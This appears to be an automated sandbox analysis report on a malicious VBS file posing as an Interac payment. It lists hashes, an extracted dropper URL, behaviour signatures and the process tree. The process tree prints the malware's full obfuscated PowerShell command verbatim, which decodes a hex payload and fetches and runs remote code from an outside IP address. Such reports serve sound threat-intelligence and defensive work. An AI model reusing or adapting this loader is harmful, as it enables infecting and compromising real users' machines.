Analysis

  • max time kernel
    76s
  • max time network
    21s
  • platform
    windows7_x64
  • resource
    win7-en-20210920
  • submitted
    20-09-2021 18:25

General

  • Target

    INTERAC PAYMENT.vbs

  • Size

    7KB

  • MD5

    f3bc5f7625cfb7d4f44f784561b05faf

  • SHA1

    8831e8de10c1365cbc23bf50b96b6292fd09af29

  • SHA256

    9b08fe9109b0e4b68f52624894d0ea9261f4a434f07d022f2d2b2d7c12877460

  • SHA512

    cd5a57d361c02aeda535d19461798d9b5779f94e17aa12cc2ee9db4ba1605a8ce8fe04dcf4a1bee312261902a7c2bb579cc916f98576d679ded10a6c64807665

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://13.112.210.240/NJNJNJNJbypass.txt

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\INTERAC PAYMENT.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1424
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $SZXDCFVGBHNJSDFGH = 'http://13HHHHHHHHHHHHH112HHHHHHHHHHHHH210HHHHHHHHHHHHH240/NJNJNJNJbypassHHHHHHHHHHHHHtxt'.Replace('HHHHHHHHHHHHH','.');$SOS='%!HHHHHHHHHHH!5HHHHHHHHHHH!!HHHHHHHHHHH5%HHHHHHHHHHH!*HHHHHHHHHHH!7HHHHHHHHHHH!8HHHHHHHHHHH!eHHHHHHHHHHH!aHHHHHHHHHHH!dHHHHHHHHHHH!bHHHHHHHHHHH!!HHHHHHHHHHH!5HHHHHHHHHHH!*HHHHHHHHHHH!7HHHHHHHHHHH!8HHHHHHHHHHH!aHHHHHHHHHHH%0HHHHHHHHHHH3dHHHHHHHHHHH%0HHHHHHHHHHH%7HHHHHHHHHHH*eHHHHHHHHHHH!5HHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH!5HHHHHHHHHHH*%HHHHHHHHHHH!3HHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH5!HHHHHHHHHHH%7HHHHHHHHHHH%eHHHHHHHHHHH5%HHHHHHHHHHH*5HHHHHHHHHHH70HHHHHHHHHHH*cHHHHHHHHHHH*1HHHHHHHHHHH*3HHHHHHHHHHH*5HHHHHHHHHHH%8HHHHHHHHHHH%7HHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%7HHHHHHHHHHH%cHHHHHHHHHHH%7HHHHHHHHHHH7!HHHHHHHHHHH%eHHHHHHHHHHH57HHHHHHHHHHH%7HHHHHHHHHHH%9HHHHHHHHHHH%eHHHHHHHHHHH5%HHHHHHHHHHH*5HHHHHHHHHHH70HHHHHHHHHHH*cHHHHHHHHHHH*1HHHHHHHHHHH*3HHHHHHHHHHH*5HHHHHHHHHHH%8HHHHHHHHHHH%7HHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%7HHHHHHHHHHH%cHHHHHHHHHHH%7HHHHHHHHHHH*cHHHHHHHHHHH!9HHHHHHHHHHH!5HHHHHHHHHHH!eHHHHHHHHHHH%7HHHHHHHHHHH%9HHHHHHHHHHH3bHHHHHHHHHHH0aHHHHHHHHHHH%!HHHHHHHHHHH53HHHHHHHHHHH58HHHHHHHHHHH!!HHHHHHHHHHH!3HHHHHHHHHHH!*HHHHHHHHHHH5*HHHHHHHHHHH!7HHHHHHHHHHH!%HHHHHHHHHHH!8HHHHHHHHHHH!eHHHHHHHHHHH!aHHHHHHHHHHH58HHHHHHHHHHH!!HHHHHHHHHHH!3HHHHHHHHHHH!*HHHHHHHHHHH5*HHHHHHHHHHH!7HHHHHHHHHHH!%HHHHHHHHHHH!8HHHHHHHHHHH!aHHHHHHHHHHH!bHHHHHHHHHHH%0HHHHHHHHHHH3dHHHHHHHHHHH%0HHHHHHHHHHH%7HHHHHHHHHHH!!HHHHHHHHHHH!fHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH*1HHHHHHHHHHH!!HHHHHHHHHHH53HHHHHHHHHHH5!HHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH!7HHHHHHHHHHH%7HHHHHHHHHHH%eHHHHHHHHHHH5%HHHHHHHHHHH*5HHHHHHHHHHH70HHHHHHHHHHH*cHHHHHHHHHHH*1HHHHHHHHHHH*3HHHHHHHHHHH*5HHHHHHHHHHH%8HHHHHHHHHHH%7HHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%7HHHHHHHHHHH%cHHHHHHHHHHH%7HHHHHHHHHHH57HHHHHHHHHHH*eHHHHHHHHHHH!cHHHHHHHHHHH*fHHHHHHHHHHH%7HHHHHHHHHHH%9HHHHHHHHHHH%eHHHHHHHHHHH5%HHHHHHHHHHH*5HHHHHHHHHHH70HHHHHHHHHHH*cHHHHHHHHHHH*1HHHHHHHHHHH*3HHHHHHHHHHH*5HHHHHHHHHHH%8HHHHHHHHHHH%7HHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH%7HHHHHHHHHHH%cHHHHHHHHHHH%7HHHHHHHHHHH7%HHHHHHHHHHH!9HHHHHHHHHHH*eHHHHHHHHHHH%7HHHHHHHHHHH%9HHHHHHHHHHH3bHHHHHHHHHHH0aHHHHHHHHHHH%!HHHHHHHHHHH53HHHHHHHHHHH57HHHHHHHHHHH58HHHHHHHHHHH!!HHHHHHHHHHH!5HHHHHHHHHHH!3HHHHHHHHHHH5%HHHHHHHHHHH!*HHHHHHHHHHH!7HHHHHHHHHHH59HHHHHHHHHHH!8HHHHHHHHHHH55HHHHHHHHHHH!aHHHHHHHHHHH!9HHHHHHHHHHH53HHHHHHHHHHH!!HHHHHHHHHHH!*HHHHHHHHHHH5*HHHHHHHHHHH!7HHHHHHHHHHH!8HHHHHHHHHHH!aHHHHHHHHHHH%0HHHHHHHHHHH3dHHHHHHHHHHH%7HHHHHHHHHHH!9HHHHHHHHHHH*0HHHHHHHHHHH!5HHHHHHHHHHH58HHHHHHHHHHH%8HHHHHHHHHHH*eHHHHHHHHHHH*0HHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH*0HHHHHHHHHHH*3HHHHHHHHHHH*0HHHHHHHHHHH5!HHHHHHHHHHH%0HHHHHHHHHHH%!HHHHHHHHHHH!5HHHHHHHHHHH!!HHHHHHHHHHH5%HHHHHHHHHHH!*HHHHHHHHHHH!7HHHHHHHHHHH!8HHHHHHHHHHH!eHHHHHHHHHHH!aHHHHHHHHHHH!dHHHHHHHHHHH!bHHHHHHHHHHH!!HHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH!7HHHHHHHHHHH!%HHHHHHHHHHH!8HHHHHHHHHHH!eHHHHHHHHHHH!aHHHHHHHHHHH53HHHHHHHHHHH!!HHHHHHHHHHH!*HHHHHHHHHHH!7HHHHHHHHHHH!8HHHHHHHHHHH%9HHHHHHHHHHH%7HHHHHHHHHHH%eHHHHHHHHHHH5%HHHHHHHHHHH*5HHHHHHHHHHH70HHHHHHHHHHH*cHHHHHHHHHHH*1HHHHHHHHHHH*3HHHHHHHHHHH*5HHHHHHHHHHH%8HHHHHHHHHHH%7HHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%7HHHHHHHHHHH%cHHHHHHHHHHH%7HHHHHHHHHHH*5HHHHHHHHHHH*0HHHHHHHHHHH57HHHHHHHHHHH*0HHHHHHHHHHH%dHHHHHHHHHHH!fHHHHHHHHHHH*%HHHHHHHHHHH*aHHHHHHHHHHH*0HHHHHHHHHHH!5HHHHHHHHHHH%7HHHHHHHHHHH%9HHHHHHHHHHH%eHHHHHHHHHHH5%HHHHHHHHHHH*5HHHHHHHHHHH70HHHHHHHHHHH*cHHHHHHHHHHH*1HHHHHHHHHHH*3HHHHHHHHHHH*5HHHHHHHHHHH%8HHHHHHHHHHH%7HHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH%7HHHHHHHHHHH%cHHHHHHHHHHH%7HHHHHHHHHHH!5HHHHHHHHHHH!*HHHHHHHHHHH!7HHHHHHHHHHH!8HHHHHHHHHHH!aHHHHHHHHHHH%9HHHHHHHHHHH%eHHHHHHHHHHH%!HHHHHHHHHHH53HHHHHHHHHHH58HHHHHHHHHHH!!HHHHHHHHHHH!3HHHHHHHHHHH!*HHHHHHHHHHH5*HHHHHHHHHHH!7HHHHHHHHHHH!%HHHHHHHHHHH!8HHHHHHHHHHH!eHHHHHHHHHHH!aHHHHHHHHHHH58HHHHHHHHHHH!!HHHHHHHHHHH!3HHHHHHHHHHH!*HHHHHHHHHHH5*HHHHHHHHHHH!7HHHHHHHHHHH!%HHHHHHHHHHH!8HHHHHHHHHHH!aHHHHHHHHHHH!bHHHHHHHHHHH%8HHHHHHHHHHH%!HHHHHHHHHHH53HHHHHHHHHHH5aHHHHHHHHHHH58HHHHHHHHHHH!!HHHHHHHHHHH!3HHHHHHHHHHH!*HHHHHHHHHHH5*HHHHHHHHHHH%7HHHHHHHHHHH%9HHHHHHHHHHH3bHHHHHHHHHHH0aHHHHHHHHHHH%*HHHHHHHHHHH%8HHHHHHHHHHH%7HHHHHHHHHHH!9HHHHHHHHHHH%7HHHHHHHHHHH%bHHHHHHHHHHH%7HHHHHHHHHHH!5HHHHHHHHHHH58HHHHHHHHHHH%7HHHHHHHHHHH%9HHHHHHHHHHH%8HHHHHHHHHHH%!HHHHHHHHHHH53HHHHHHHHHHH57HHHHHHHHHHH58HHHHHHHHHHH!!HHHHHHHHHHH!5HHHHHHHHHHH!3HHHHHHHHHHH5%HHHHHHHHHHH!*HHHHHHHHHHH!7HHHHHHHHHHH59HHHHHHHHHHH!8HHHHHHHHHHH55HHHHHHHHHHH!aHHHHHHHHHHH!9HHHHHHHHHHH53HHHHHHHHHHH!!HHHHHHHHHHH!*HHHHHHHHHHH5*HHHHHHHHHHH!7HHHHHHHHHHH!8HHHHHHHHHHH!aHHHHHHHHHHH%0HHHHHHHHHHH%dHHHHHHHHHHH!aHHHHHHHHHHH*fHHHHHHHHHHH*9HHHHHHHHHHH*eHHHHHHHHHHH%0HHHHHHHHHHH%7HHHHHHHHHHH%7HHHHHHHHHHH%9HHHHHHHHHHH7cHHHHHHHHHHH%*HHHHHHHHHHH%8HHHHHHHHHHH%7HHHHHHHHHHH!9HHHHHHHHHHH%7HHHHHHHHHHH%bHHHHHHHHHHH%7HHHHHHHHHHH!5HHHHHHHHHHH58HHHHHHHHHHH%7HHHHHHHHHHH%9HHHHHHHHHHH3b'.Replace('%','2').Replace('!','4').Replace('*','6');Invoke-Expression (-join ($SOS -split 'HHHHHHHHHHH' | ? { $_ } | % { [char][convert]::ToUInt32($_,16) }))
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1580

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1424-53-0x000007FEFBB51000-0x000007FEFBB53000-memory.dmp
    Filesize

    8KB

  • memory/1580-54-0x0000000000000000-mapping.dmp
  • memory/1580-56-0x000007FEF1FC0000-0x000007FEF2B1D000-memory.dmp
    Filesize

    11.4MB

  • memory/1580-59-0x0000000002584000-0x0000000002587000-memory.dmp
    Filesize

    12KB

  • memory/1580-60-0x000000000258B000-0x00000000025AA000-memory.dmp
    Filesize

    124KB

  • memory/1580-58-0x0000000002582000-0x0000000002584000-memory.dmp
    Filesize

    8KB

  • memory/1580-57-0x0000000002580000-0x0000000002582000-memory.dmp
    Filesize

    8KB